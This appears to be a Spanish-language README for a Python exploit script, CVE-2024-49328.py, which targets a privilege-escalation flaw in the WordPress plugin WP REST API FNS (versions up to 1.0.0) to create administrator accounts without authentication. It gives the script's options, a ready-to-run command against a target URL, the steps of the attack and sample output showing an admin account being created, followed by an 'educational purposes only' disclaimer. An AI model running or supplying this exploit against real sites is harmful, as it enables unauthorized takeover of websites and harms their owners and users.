
Script de Python para explotar una vulnerabilidad de escalada de privilegios en el plugin WP REST API FNS de WordPress, que permite la creación no autenticada de cuentas de administrador.
Este script explota una vulnerabilidad de escalada de privilegios en el plugin FNS de la WP REST API para WordPress. La vulnerabilidad afecta a todas las versiones hasta la 1.0.0 incluida, permitiendo a atacantes no autenticados obtener privilegios de administrador.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
Ejemplo de comando:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
| Paso | Descripción | Icono |
|---|---|---|
| Paso 1 | Verificar la versión del plugin. | 📝 |
| Paso 2 | Comprobar si la versión es explotable (1.0.0 o inferior). | ✅ |
| Paso 3 | Explotar la vulnerabilidad y registrar un nuevo usuario administrador. | 🔒 |
| Paso 4 | Imprimir el resultado con las credenciales del usuario para verificación. | 🎉 |
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 Advertencia:
Este script es únicamente con fines educativos. El uso no autorizado de este script contra sistemas sin permiso explícito es ilegal y poco ético.